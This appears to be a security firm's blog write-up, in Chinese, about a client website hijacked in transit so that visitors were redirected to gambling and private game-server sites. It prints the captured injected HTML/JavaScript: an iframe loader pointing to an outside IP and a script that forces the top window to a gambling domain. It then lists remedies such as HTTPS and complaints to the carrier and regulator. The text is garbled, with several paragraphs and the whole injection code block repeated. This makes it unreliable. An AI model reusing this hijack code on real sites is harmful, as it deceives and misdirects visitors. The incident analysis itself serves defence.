最近客戶網站經常被跳轉到一些私服以及博彩網站上去,導致網站的訪問流量急劇下滑,
客戶的網站損失較大,問題發生在2018年4月初,一開始沒有那麼多客戶訪問網站被跳轉,慢
慢的用戶就開始投訴反饋了,說是網站跳轉到另外一個網站上去了,跳轉的網址是cq4sd9.qm
sw.club:1277 打開一看是私服廣告網站。如下圖:
經過我們eSafe白帽資安網工程師對其主機進行遠程安全檢測,分析,發現這次網站被跳轉到另外一個
網站上去的問題,跟上次不太一樣,沒有發現網站代碼被篡改,以前的跳轉是根據搜索引擎來進
行判斷條件跳轉,從搜索引擎點擊進去會直接跳轉到賭博網站,而這次不管是從搜索引擎還是其
他直接輸入域名都會被強制的跳轉到私服網站上去。通過檢查網站的訪問日誌也沒發現異常的問
題,所以直接在用戶的電腦裡進行了遠程抓包分析.
網站上去的問題,跟上次不太一樣,沒有發現網站代碼被篡改,以前的跳轉是根據搜索引擎來進
行判斷條件跳轉,從搜索引擎點擊進去會直接跳轉到賭博網站,而這次不管是從搜索引擎還是其
他直接輸入域名都會被強制的跳轉到私服網站上去。通過檢查網站的訪問日誌也沒發現異常的問
題,所以直接在用戶的電腦裡進行了遠程抓包分析.
我們來看下抓取到的數據包,首先看到的就是網站首頁整個數據包被替換成了劫持的代碼:
<!DOCTYPE HTML><html><head><script> (function(w){ var a7= w.a7 || {} ;
var d=document; a7.u = function() { var f = d.location.href;
d.getElementById("m").src=f+(f.indexOf("?")<0 ? '?':'&')+'_t_t_t='+Math.random();
}; a7.c = function() { d.getElementById('x').style.display=
"none"; }; w.a7 = a7; })(window);</script><style>body {margin:0;co
lor:#000;overflow:hidden;padding:0;height:100%;font-family:Arial}#c{cursor:pointer;display:
block;position:absolute;border:1px;border-radius:1em;background-color:#fff;color:#555;z-in
dex:3;right:5px;top:5px;line-height:20px;text-align:center;width:20px;font-size:10px}#x{positi
on:absolute;z-index:2;left:-512px;top:10px;margin-left:50%;width:1024px;height:768px;}#i{d
isplay:block; position:absolute; z-index:1; width:100%; height:100%}</style></head><body
onLoad=a7.u()> <div id=i> <iframe id=m frameborder=0 width=100% height=100%>
</iframe></div><div id=x> <a id="c" onClick=a7.c()>X</a> <iframe id=a width=10
24 height=768 scrolling=no frameborder=0></iframe></div><script>setTimeout(function()
{document.getElementById('a').src = 'http://121.42.246.234:8080/tx1d9djdd/1.html';},1000);
setTimeout(function(){document.getElementById('x').style.display = 'none';},16000);
</script></body></html>
var d=document; a7.u = function() { var f = d.location.href;
d.getElementById("m").src=f+(f.indexOf("?")<0 ? '?':'&')+'_t_t_t='+Math.random();
}; a7.c = function() { d.getElementById('x').style.display=
"none"; }; w.a7 = a7; })(window);</script><style>body {margin:0;co
lor:#000;overflow:hidden;padding:0;height:100%;font-family:Arial}#c{cursor:pointer;display:
block;position:absolute;border:1px;border-radius:1em;background-color:#fff;color:#555;z-in
dex:3;right:5px;top:5px;line-height:20px;text-align:center;width:20px;font-size:10px}#x{positi
on:absolute;z-index:2;left:-512px;top:10px;margin-left:50%;width:1024px;height:768px;}#i{d
isplay:block; position:absolute; z-index:1; width:100%; height:100%}</style></head><body
onLoad=a7.u()> <div id=i> <iframe id=m frameborder=0 width=100% height=100%>
</iframe></div><div id=x> <a id="c" onClick=a7.c()>X</a> <iframe id=a width=10
24 height=768 scrolling=no frameborder=0></iframe></div><script>setTimeout(function()
{document.getElementById('a').src = 'http://121.42.246.234:8080/tx1d9djdd/1.html';},1000);
setTimeout(function(){document.getElementById('x').style.display = 'none';},16000);
</script></body></html>
http://121.42.246.234:8080/tx1d9djdd/1.html 這個劫持代碼存放在阿里雲的主機裡,直接
嵌入框架代碼,進行網站跳轉。看來是有目的的性的選擇地區劫持,尤其是台灣聯通線路。
嵌入框架代碼,進行網站跳轉。看來是有目的的性的選擇地區劫持,尤其是台灣聯通線路。
<!doctype html>
<html>
<head>
<meta charset="utf-8">
<title></title>
</head>
<body style="margin:0">
<a href="http://cq4sd9.qmsw.club:1277/" target="_blank">
<img src="1.jpg" width="1024" height="768">
</a>
<div style="display:none">
<script src="http://s95.cnzz.com/stat.php?id=1261830135&web_id=1261830135" language="JavaScript"></script>
<script src="https://s13.cnzz.com/z_stat.php?id=1271906869&web_id=1271906869" language="JavaScript"></script>
<script src="https://s19.cnzz.com/z_stat.php?id=1273220936&web_id=1273220936" language="JavaScript"></script>
<script language="JavaScript">
setTimeout("top.location.href='http://cq4sd9.qmsw.club:1277/';", 1000);
</script>
</div>
</body>
</html>
那麼遇到網站被運營商劫持該如何處理? 網站被跳轉到另外一個網站上去怎麼才能徹底的解決
問題呢?解決方案如下:
問題呢?解決方案如下:
啟用網站https協議,部署SSL證書,用https訪問網站即可。
向本地的電信運營商進行投訴,直接打官方客服電話說明自己的問題,打開某一網址會直接跳
轉到私服,博彩網站上,讓他們抓緊解決問題,如果不解決直接投訴到工信部裡去。
轉到私服,博彩網站上,讓他們抓緊解決問題,如果不解決直接投訴到工信部裡去。
利用微博投訴運營商,微博@中國聯通 @中國聯通客服 還有自己當地的電信官方微博,把問題
反饋給他們,並轉發。
反饋給他們,並轉發。
實在不行就到工信部去投訴,工信部對於用戶的投訴,尤其網站被跳轉到私服、博彩網站上去這
樣的問題,會直接處理,投訴的時候要用真實信息,核心真實身份後會立即處理。工信部投訴網
址 http://www.chinatcc.gov.cn:8080/cms/shensu/
樣的問題,會直接處理,投訴的時候要用真實信息,核心真實身份後會立即處理。工信部投訴網
址 http://www.chinatcc.gov.cn:8080/cms/shensu/
如果網站被跳轉到別的網站上去,不是運營商劫持所致,那應該是自身的網站代碼被駭客篡改了,
尤其網站在百度的裡快照也會被篡改,像這種情況就得需要對網站程序代碼進行安全檢測,以及
網站漏洞修復,網站木馬後門清除了,有條件的話建議找專業的網站安全公司處理。
尤其網站在百度的裡快照也會被篡改,像這種情況就得需要對網站程序代碼進行安全檢測,以及
網站漏洞修復,網站木馬後門清除了,有條件的話建議找專業的網站安全公司處理。
